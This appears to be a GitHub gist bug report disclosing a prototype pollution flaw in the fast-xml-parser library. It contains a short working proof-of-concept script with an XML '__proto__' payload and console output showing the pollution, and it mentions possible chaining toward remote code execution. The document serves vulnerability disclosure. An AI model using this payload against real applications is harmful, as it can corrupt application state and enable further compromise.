Skip to content

Instantly share code, notes, and snippets.

@Sudistark

Sudistark/report.md Secret

Last active February 12, 2023 11:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Sudistark/a5a45bd0804d522a1392cb5023aa7ef7 to your computer and use it in GitHub Desktop.
Save Sudistark/a5a45bd0804d522a1392cb5023aa7ef7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
report.md

Taking an example code from the github repo to demonstrate the bug:

const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");


let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);


console.log(jObj.polluted) // should return hacked

Code_G3UvvJcSv5

In the above screenshot you can see the jObj was polluted with a new property.

jObj
>{}
jObj.__proto__
>{polluted: 'hacked'}
jObj.__proto__.polluted
>'hacked'

More information on prototype pollution can be found here: https://learn.snyk.io/lessons/prototype-pollution/javascript/

As it is common for developers to pass user controllable input to XMLParser , this can to do unexpected results. By chaining it with some prototype pollution gadget it might even can lead to RCE in some cases https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment